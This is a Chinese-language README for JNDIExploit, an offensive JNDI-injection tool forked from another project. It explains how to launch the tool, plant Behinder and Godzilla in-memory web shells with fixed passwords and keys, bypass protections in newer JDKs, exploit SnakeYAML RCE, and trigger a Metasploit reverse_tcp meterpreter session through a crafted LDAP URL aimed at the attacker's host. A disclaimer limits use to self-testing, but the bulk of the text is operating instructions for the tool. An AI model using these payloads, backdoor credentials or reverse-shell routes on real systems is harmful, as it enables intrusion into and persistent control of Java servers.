JNDIExploit
一款用于 JNDI注入
利用的工具,大量參考/引用了 Rogue JNDI
項目的代碼,支持直接植入內(nèi)存shell
,并集成了常見的bypass 高版本JDK
的方式,適用于與自動化工具配合使用。
對 @feihong-cs 大佬的項目https://github.com/feihong-cs/JNDIExploit 進行了一些改進,tomcatBypass現(xiàn)可直接上線msf。見添加內(nèi)容2
免責聲明
該工具僅用于安全自查檢測
由于傳播、利用此工具所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。
本人擁有對此工具的修改和解釋權。未經(jīng)網(wǎng)絡安全部門及相關部門允許,不得善自使用本工具進行任何攻擊活動,不得以任何方式將其用于商業(yè)目的。
添加內(nèi)容
添加內(nèi)容是為了支持SpringBootExploit工具,是定制版的服務端。
- 啟動方式:java -jar JNDIExploit-1.3-SNAPSHOT.jar 默認綁定127.0.0.1 LDAP 綁定 1389 HTTP Server 綁定3456
- 根目錄下BehinderFilter.class是內(nèi)存馬 /ateam 密碼是ateamnb
- data/behinder3.jar 是為了支持SnakYaml RCE
- 添加HTTPServer處理更多的請求,為了更好支持SpringBootExploit工具
- 將文件放在data目錄下,通過HTTPServer可以訪問文件內(nèi)容如同python的HTTPServer
添加內(nèi)容2
新增哥斯拉內(nèi)存馬
- 支持引用類遠程加載方式打入(Basic路由)
- 支持本地工廠類方式打入 (TomcatBypass路由)
哥斯拉客戶端配置:
密碼:pass1024
密鑰:key
有效載荷:JavaDynamicPayload
加密器:JAVA_AES_BASE64
修復之前版本中的一些問題,冰蝎內(nèi)存馬現(xiàn)已直接可用冰蝎客戶端直連
新增msf上線支持
- 支持tomcatBypass路由直接上線msf:
使用msf的java/meterpreter/reverse_tcp開啟監(jiān)聽ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/[msfip]/[msfport]
TODO
- 本地ClassPath反序列化漏洞利用方式
- 支持自定義內(nèi)存馬密碼
- 內(nèi)存馬模塊改一下
使用說明
使用 java -jar JNDIExploit.jar -h
查看參數(shù)說明,其中 --ip
參數(shù)為必選參數(shù)